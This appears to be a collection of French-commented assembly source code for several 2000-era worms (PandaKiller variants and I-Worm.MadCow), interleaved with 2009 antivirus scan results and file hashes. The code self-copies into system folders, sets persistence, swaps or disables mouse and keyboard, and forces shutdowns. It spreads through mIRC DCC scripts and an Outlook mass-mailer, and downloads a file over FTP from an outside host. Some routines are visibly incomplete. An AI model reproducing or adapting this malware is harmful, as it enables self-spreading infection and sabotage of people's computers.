Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 -
Additional information
File size: 8192 bytes
MD5...: 104229b6d583df50db044f0d89fc7db9
SHA1..: db05dc880b74d864a8c47d8db22c2847b655c14a
comment $
W32.PandaKiller.A par PandaKiller le 12 octobre 2000
CREER DEUX REPERTOIRE : - C:\PandaKiller

- %windir%\Panda
S'AUTO-COPIE DANS : - %windir%\Pandakiller.exe

- %windir%\Panda\Stages.exe
- %system%\Monopoly.exe
DESCRIPTION:
Dans C:\PandaKiller, il cr‚e le fichier "EMail.txt" o— il ‚crit une adresse

EMail o— peut nous contacter ainsi qu'un copyright.
Il affiche un message et change les bouttons de la souris si on clique
sur r‚‚ssayer et modifie ‚galement le nom d'enregistrement par PandaKiller
POUR COMPILER:
tasm32 /M /ML PandaKiller.asm

tlink32 -Tpe -x -aa PandaKiller.obj,,,import32
Lien : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net
.386p
locals
jumps
.model flat
extrn CreateDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn SwapMouseButton:PROC
.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
rep1 db "C:\PandaKiller",00h
rep2 db "\Panda",00h
copie1 db "\PandaKiller.exe",00h
copie2 db "\Monopoly.exe",00h
copie3 db "\Panda\Stages.exe",00h
fichier db "\PandaKiller\EMail.txt",00h
TITRE db "Par PandaKiller le 12/10/00",00h

TEXTE db "****************************",10,13
db "Ce fichier n'est pas valide!",10,13
db "****************************",00h
TXT db "[PandaKiller]",0dh,0ah
db "Pour tout contact : Panda34@caramail.com",0dh,0ah
db "VBS/LoveLetter.A",0dh,0ah
db "VBS/IE55",0dh,0ah
db "W32.Happy99",0dh,0ah
db "I-Worm/Kak.A",0dh,0ah
db "W32.PandaKiller.A par PandaKiller (c)2000",00h
taille equ $-TXT
.code
DEBUT:
CREER_REPERTOIRE:
push 00000000h
push offset rep1
call CreateDirectoryA ;C:\Pandakiller
push 260
push offset targ1
call GetWindowsDirectoryA
push offset rep2
push offset targ1
call lstrcat
push offset targ1
call CreateDirectoryA ;%windir%\Panda
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\PandaKiller.exe
push 260
push offset targ1
call GetSystemDirectoryA
push offset copie2
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%system%\Monopoly.exe
push 260
push offset targ10
push offset copie3
push offset targ10
call lstrcat
push 00000000h
push offset targ10
push offset targ1
call CopyFileA ;%windir%\Panda\Stages.exe
FICHIER_TEXTE:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset fichier
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push taille
push offset TXT
push [fh]
call WriteFile
push [fh]
call CloseHandle
REGISTRE:
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 05h
push 01h
push 0
push p
call RegSetValueExA ;CREE UN REGISTRE
push 0
MESSAGE:
push 35h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
cmp eax,4
jne FIN
SOURIS: push 01h

call SwapMouseButton
jmp MESSAGE
FIN:
push 0
call ExitProcess
end DEBUT
File W32PKa.exe received on 05.16.2009 10:40:20 (CET)

a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 W32/Heuristic-131!Eldorado
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 -
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 -
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 W32/Heuristic-131!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Suspicious:W32/Malware!Gemini
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 -
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Heur.Worm.Generic
McAfee 5616 2009.05.15 -
Microsoft 1.4602 2009.05.16 -
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 -
PCTools 4.4.2.0 2009.05.15 -
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 -
MD5...: 711f77c3a07ea085bee6c1bfa884f012
SHA1..: 3cd6512c587c3b0292264177f3d538aa6e9c6965
comment $
W32.PandaKiller.B par PandaKiller le 14 octobre 2000
S'AUTO-COPIE DANS : - %windir%\WinExec.exe
DESCRIPTION:
Ce programme modifie le nom d'enregistrement en PandaKiller. Il se copie
dans %windir% (Dossier WINDOWS) et modifie la page de d‚marrage d'Internet.
Il cr‚e ensuite trois fichiers :
- FTP.DRV : ce fichier va se connecter par FTP et t‚l‚charger un programme
qui est KILL_CIH.EXE (un programme contre CIH)
- FTP.BAT : il va ‚x‚cuter FTP.DRV
- MIRC.EKP : un script pour mIRC qui permet une autoprobagation du fichier.
A la connection, il active FTP.BAT et cope WINEXEC.EXE en
PICTURE.EXE. Quand quelqu'un arrive, il lui envoie PICTURE.EXE
*worm* il envoie ‚galement PICTURE.EXE
*KKK* : d‚connecte
*White Power* : ‚teint le programme
*hitler* : efface Regedit.exe
POUR COMPILER:
tasm32 /M /ML PandaKiller2.asm

tlink32 -Tpe -x -aa PandaKiller2.obj,,,import32
Lien : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net
$
.386p
locals
jumps
.model flat
extrn lstrcat:PROC
extrn WinExec:PROC
.data
moi dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
DONNEE2 db "http://kadosh.multimania.com",00h
NOM2 db "Start Page",00h
CLE3 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE3 db "C:\Win\kill_cih.exe",00h
NOM3 db "killcih",00h
copie1 db "\WinExec.exe",00h
dossier db "C:\Win",00h
bat db "C:\Win\ftp.bat",00h
drv db "C:\Win\ftp.drv",00h
ini db "C:\Win\mirc.ekp",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
batd db "@echo off",0dh,0ah

db "start ftp -i -v -s:C:\Win\ftp.drv",00h
batsize equ $-batd
drvd db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "cd Panda",0dh,0ah
db "binary",0dh,0ah
db "lcd C:\Win",0dh,0ah
db "get kill_cih.exe",0dh,0ah
db "bye",0dh,0ah
db "exit",0dh,0ah
drvsize equ $-drvd
inid db "[SCRIPT]",0dh,0ah
db "n1=on 1:start:{",0dh,0ah
db "n2=.remote on",0dh,0ah
db "n3=.ctcps on",0dh,0ah
db "n4=.events on",0dh,0ah
db "n5=}",0dh,0ah
db "n6=on 1:connect:{",0dh,0ah
db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah
db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah
db "n9=on 1:join:#:{",0dh,0ah
db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n11=}",0dh,0ah
db "n12=on 1:text:*worm*:{",0dh,0ah
db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n14=}",0dh,0ah
db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah
db "n16=on 1:text:*white power*:/exit",0dh,0ah
db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah
inisize equ $-inid
.code
REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 05h
push 01h
push 0
push p
call RegSetValueExA ;CREE UNE VALEUR
push 0
AUTO_COPIE:
push 00000000h
push 260
push offset moi
push eax
push 260
push offset targ1
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe
CREER_DOSSIER:
push 00000000h
push offset dossier
call CreateDirectoryA ;C:\Win
REGISTRE2:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000001h ;HKEY_CURRENT_USER
push 05h
push offset DONNEE2 ;kadosh.multimania.com
push 01h
push 0
push offset NOM2 ;Start Page
push p
push 0
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE3
push 05h
push offset DONNEE3 ;C:\nobo.exe
push 01h
push 0
push offset NOM3 ;NOBO
push p
push 0
FICHIER:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset bat
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push batsize
push offset batd
push [fh]
call WriteFile
push [fh]
call CloseHandle
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset drv
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push drvsize
push offset drvd
push [fh]
call WriteFile
push [fh]
call CloseHandle
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset ini
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push inisize
push offset inid
push [fh]
call WriteFile
push [fh]
call CloseHandle
COPIE_MIRC:
push 00000000h
push offset script1
push offset ini
call CopyFileA
push 00000000h
push offset script2
push offset ini
call CopyFileA
push 00000000h
push offset script3
push offset ini
call CopyFileA
push 00000000h
push offset script4
push offset ini
call CopyFileA
WinExecBat:
push 1
push offset bat
call WinExec
FIN: push 0
call ExitProcess
end REGISTRE
File W32PKb.exe received on 05.16.2009 10:41:58 (CET)

a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 HEUR/Malware
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 Generic.Malware.SIsp!.664610C1
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Trojan.MulDrop.origin
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 -
F-Secure 8.0.14470.0 2009.05.15 W32/P2PWorm
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 Generic.Malware.SIsp!.664610C1
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Heur.StartPage
McAfee 5616 2009.05.15 New Malware.b
McAfee+Artemis 5616 2009.05.15 New Malware.b
McAfee-GW-Edition 6.7.6 2009.05.15 Heuristic.Malware
Microsoft 1.4602 2009.05.16 -
Norman 6.01.05 2009.05.16 W32/P2PWorm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 Suspicious file
PCTools 4.4.2.0 2009.05.15 IRC.Sensi.B
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 IRC.Sensi.B
MD5...: 58c6c31028ac1b84cc73eb13300f21da
SHA1..: a73cf795bc76385b71158a64cc770a813b399b74
comment $
*** ** * * *** ** * * * * * **** ***

* * * * ** * * * * * * * * * * * * *
* * * * ** * * * * * ** * * * ** * *
* * **** * ** * * **** ** * * * * ***
* * * * ** * * * * * * * * * * * *
* * * * * *** * * * * * **** **** **** * *
W32.PandaKiller.C par PandaKiller le 17 octobre 2000
S'AUTO-COPIE DANS : - %windir%\WinExec.exe
DESCRIPTION : 5/12 : Nom d'enregistrement : PandaKiller

2001 : D‚sactive clavier et souris
POUR COMPILER:
tasm32 /M /ML PandaKiller3.asm

tlink32 -Tpe -x -aa PandaKiller3.obj,,,import32
$
jumps
locals
.386
.model flat
extrn lstrcat:PROC
extrn GetSystemTime:PROC
.data
moi dd 260 dup (0)
copie db "\WinExec.exe",00h
l dd 0
p dd 0
CLE2 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE2 db "%windir%\WinExec.exe",00h
NOM2 db "WinExec",00h
DONNEE3 db "rundll32 mouse,disable",00h
NOM3 db "Stop1",00h
DONNEE4 db "rundll32 keyboard,disable",00h
NOM4 db "Stop2",00h
TITRE db "T.PK.3",00h
TEXTE db "VOUS SOUHAITE UNE BONNE ANNEE !",00h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
.code
DEBUT:
AUTO_COPIE:
push 00000000h
push 260
push offset moi
push eax
push 260
push offset targ1
push offset copie
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 05h
push offset DONNEE2 ;%windir%\WinExec.exe
push 01h
push 0
push offset NOM2
push p
push 0
HEURE: push offset SystemTime

call GetSystemTime
cmp [SystemTime.wMonth],0Ch
jne HEURE2
cmp [SystemTime.wDay],05h
jne HEURE2
REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 05h
push 01h
push 0
push p
push 0
HEURE2: push offset SystemTime

call GetSystemTime
cmp [SystemTime.wYear],7D1h
jne FIN
REGISTRE2:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 05h
push offset DONNEE3 ;mouse,disable
push 01h
push 0
push offset NOM3
push p
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 05h
push offset DONNEE4 ;keyboard,disable
push 01h
push 0
push offset NOM4
push p
push 0
call RegCloseKey
MESSAGE:push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
FIN:
push 0
call ExitProcess
end DEBUT
File W32PKc.exe received on 05.16.2009 10:42:04 (CET)

a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 BAT/Generic
BitDefender 7.2 2009.05.16 -
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Trojan.DownLoader.origin
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 -
F-Secure 8.0.14470.0 2009.05.15 Suspicious:W32/Malware!Gemini
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 -
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 -
McAfee 5616 2009.05.15 -
Microsoft 1.4602 2009.05.16 -
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
PCTools 4.4.2.0 2009.05.15 -
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 -
MD5...: a133a8af3b031045bd0ae4c7d9fa4210
SHA1..: d3481290f42e9f1485d7d9cdc5184159e5272297
comment $
*** ** * * *** ** * * * * * **** ***
* * * * ** * * * * * * * * * * * * *
* * * * ** * * * * * ** * * * ** * *
* * **** * ** * * **** ** * * * * ***
* * * * ** * * * * * * * * * * * *
* * * * * *** * * * * * **** **** **** * *
W95/98.PandaKiller par PandaKiller le 1er novembre 2000

POUR COMPILER:
tasm32 /M /ML ?????.asm

tlink32 -Tpe -x -aa ?????.obj,,,import32
.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn DeleteFileA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
;USER32.dll
extrn ExitWindowsEx:PROC
extrn GetVersionExA:PROC
;ADVAPI32.dll
.data
szOrig db 260 dup (0)
szCopie db 260 dup (0)
szWsk1 db 260 dup (0)
szWsk2 db 260 dup (0)
szWin db 260 dup (0)
szWin2 db 260 dup (0)
fh dd 0
octets dd 0
regDisp dd 0
regResu dd 0
Copie db "\WinExec.exe",00h
Wsk1 db "\WSOCK32.DLL",00h
Wsk2 db "\WSOCK32.TPK",00h
Wininit db "\\WININIT.INI",00h
windows db "windows",00h
run db "run",00h
Winini db "\\WIN.INI",00h
nul db "NUL",00h
rename db "Rename",00h
ini db "C:\script.tpk",00h
CLE db "Software\[PandaKiller]",00h
TITRE db "Error Loader",00h
TEXTE db "Windows NT required !",0dh,0ah
db "This program will be terminated",00h
inid db "[script]",0dh,0ah
db "n0=on 1:start:{",0dh,0ah
db "n1=.remote on",0dh,0ah
db "n2=.ctcps on",0dh,0ah
db "n3= .events on",0dh,0ah
db "n4=}",0dh,0ah
db "n5=on 1:join:#:{",0dh,0ah
db "n6= if ( $nick == $me ) { halt } | .dcc "
db "send $nick C:\Windows\WinExec.exe",0dh,0ah
db "n7=}",0dh,0ah
initaille equ $-inid
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
SYSTIME ends
.code
DEBUT: mov eax, offset CLE ; V‚rifie si il existe une cl‚
call REG ; [PandaKiller] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas,
jne FICHIER ; il installe les composants
WCOPIE: push 0 ;
call GetModuleHandleA ;
push 260 ; Le programme se copie dans le
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; dossier WINDOWS de l'ordinateur
push 260 ;
push offset szCopie ; et se nommera WinExec.exe
call GetWindowsDirectoryA ;
push offset Copie ;
push offset szCopie ;
call lstrcat ;
push 0 ;
call CopyFileA ;
WIN_INI:push 260 ; On met dans le fichier WIN.INI

push offset szWin2 ; une routine pour que le programme
call GetWindowsDirectoryA ; s'active … chaque d‚marrage.
push offset Winini ; Cela ‚vite d'utiliser la BASE DE
push offset szWin2 ; REGISTRE trop voyante.
call lstrcat ;
push offset szWin2 ; Dans WIN.INI du dossier WINDOWS
push offset szCopie ; "nom du programme"
push offset run ; run=
push offset windows ; [windows]
call WritePrivateProfileStringA ;
WSOCK32:push 260 ;
push offset szWsk1 ; Ici, on copie le fichier du
call GetSystemDirectoryA ; r‚pertoire SYSTEM, WSOCK32.DLL
push 260 ;
push offset szWsk2 ; en WSOCK32.TPK dans le mˆme
call GetSystemDirectoryA ; r‚pertoire SYSTEM
push offset Wsk1 ;
push offset szWsk1 ;
call lstrcat ;
push offset Wsk2 ;
call lstrcat ;
push 0 ;
call CopyFileA ;
WININIT:push 260 ; Pour que l'ordinateur puisse
push offset szWin ; utiliser le nouveau fichier
call GetWindowsDirectoryA ; WSOCK32.TPK, on va ‚crire dans
push offset Wininit ; le fichier WININIT.INI dans le
push offset szWin ; r‚pertoire WNDOWS.
call lstrcat ; La routine est simple :
push offset szWin ;
push offset nul ;
push offset rename ; [Rename]
call WritePrivateProfileStringA ; NUL=%system%\WSOCK32.DLL
push offset szWin ;
push offset rename ;
call WritePrivateProfileStringA ; %sys%\WSOCK32.DLL=%sys%\WSOCK32.TPK
jmp FICHIER
REG: push offset regDisp ;

push offset regResu ;
push 0 ; default security descriptor
push 0F003FH ; KEY_ALL_ACCESS
push 0 ;
push 0 ;
push 0 ;
push eax ; adresse de la sous-CLE
push 80000002h ; HKEY_LOCAL_MACHINE
call RegCreateKeyExA ;
SUITE: push [regResu] ;
call RegCloseKey ;
ret
FICHIER:push 00000000h ; Voila, un des moyens les plus

push 00000080h ; pratique pour envoyer notre
push 00000002h ; programme un peu partout.
push 00000000h ;
push 00000001h ; C'est mIRC.
push 40000000h ;
push offset ini ; En utilisant un script, mIRC va
call CreateFileA ; automatiquement envoyer notre
mov [fh],eax ; programme … tous ceux qui se trouve
push 00h ; dans le CHANNEL de la victime.
push offset octets ;
push initaille ; Pour cela, on va ‚crire le script
push offset inid ; dans le dossier C:\
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
COPIE: push 00000000h ; Puis on va le copier dans les

push offset script1 ; dossier suivant :
push offset ini ;
call CopyFileA ; C:\mirc
push 00000000h ;
push offset script2 ;
push offset ini ;
call CopyFileA ; C:\mirc32
push 00000000h ;
push offset ini ;
call CopyFileA ; C:\program files\mirc
push 00000000h ;
push offset ini ;
call CopyFileA ; C:\program files\mirc32
push 00h ;
push offset ini ;
call DeleteFileA ; Puis efface l'original.
ATTEND: push 60 * 1 * 1000 ;

call Sleep ; Fait une pause de 1 minute.
SOURIS: push 01h ;

call SwapMouseButton ; Modifie les boutons de la souris.
HEURE2: push offset SystemTime ;

call GetSystemTime ; Regarde la date du systˆme.
cmp [SystemTime.wYear],7D1h ; Si nous ne sommes pas en l'an 2001,
jne ALERT ; il saute au label ALERT
ETEIND: push 01h ;
call ExitWindowsEx ; Sinon ‚teind l'ordinateur.
ALERT: push 10h ;
push offset TITRE ; Affiche le faux message d'erreur.
push offset TEXTE ;
push 0 ;
call MessageBoxA ;
FIN: push 0 ;
call ExitProcess ; Fin du Programme
end DEBUT
File W95PK.exe received on 05.16.2009 10:42:08 (CET)

a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 HEUR/Malware
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 IRC/Generic.dropper
BitDefender 7.2 2009.05.16 BehavesLike:Win32.IRC-Worm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 W32.Ultratt.gz
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 BACKDOOR.Trojan
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 -
F-Secure 8.0.14470.0 2009.05.15 W32/P2PWorm
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 BehavesLike:Win32.IRC-Worm
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.DOS.Generic
McAfee 5616 2009.05.15 New Malware.b
McAfee+Artemis 5616 2009.05.15 New Malware.b
McAfee-GW-Edition 6.7.6 2009.05.15 Heuristic.Malware
Microsoft 1.4602 2009.05.16 -
Norman 6.01.05 2009.05.16 W32/P2PWorm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 -
PCTools 4.4.2.0 2009.05.15 IRC.Buffy.C
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 Possible_Virus
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 IRC.Buffy.C
MD5...: f7b2facb5e2c9e5870065004446a8867
SHA1..: 837ce36b596ffab1af92ac1c63506fa613e16e6c
comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000
Pour assembler : tasm32 /M /ML madcow.asm

tlink32 -Tpe -aa -x madcow.obj,,,import32.lib *
jumps
locals
.386
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn MoveFileA:PROC
extrn WinExec:PROC
;ADVAPI32.dll
.data
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
fh dd 0
octets dd ?
szOrig2 db 260 dup (0)
szCopi2 db 260 dup (0)
szCico db 260 dup (0)
Dossier db "C:\Win32",00h
fichier db "C:\Win32\Salut.ico",00h
Copico db "\MSLS.ICO",00h
Copie db "\Wininet32.exe",00h
Copie2 db "\MadCow.exe",00h
BATFILE db "C:\Win32\ENVOIE.BAT",00h
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
run db "run",00h
fileini db "C:\Win32\script.ini",00h
Copie3 db "C:\Win32\MadCow.exe",00h
CLE db "Software\[Atchoum]",00h
CLE2 db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"
vbsd:
db 'EMAIL()',0dh,0ah
db '',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'If O = 1 Then',0dh,0ah
db 'N.BCC = P.Address',0dh,0ah
db 'Else',0dh,0ah
db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
vbstaille equ $-vbsd
batd:
db '@echo off',0dh,0ah
db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd
inid:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
db "n3=}",00h
initaille equ $-inid
include icone.inc
.code
DEBUT:
VERIF: mov eax,offset CLE ; Vérifie si il existe une clé
call REG ; [Atchoum] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas,
jne INIFILE ; on installe les composants
COPIE: push 0 ;
push 260 ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 260 ;
call GetSystemDirectoryA ; dans le dossier SYSTEM
push offset Copie ;
call lstrcat ; sous le nom de Wininet32.exe
push 00h ;
call CopyFileA ;
push 260 ; puis
push offset szCopi2 ;
call GetWindowsDirectoryA ; … nouveau dans le dossier WINDOWS
push offset Copie2 ;
call lstrcat ; sous le nom de MadCow.exe
push 00h ;
call CopyFileA ;
WIN_INI:push 260 ; Pour lancer le programme, on peut

push offset szWin ;
call GetWindowsDirectoryA ; utiliser la base de registre ou le
push offset Winini ;
push offset szWin ; fichier WIN.INI dans le dossier
call lstrcat ;
push offset szWin ; WINDOWS. La démarche est simple :
push offset szCopie ; [windows]
push offset run ; run="nom du programme"
push offset windows ;
DIR: push 00h ; On crée ici C:\Win32
push offset Dossier ;
call CreateDirectoryA ;
EMAIL :push 00000000h ; On va créer C:\Win32\ENVOIE.VBS
push 00000080h ;
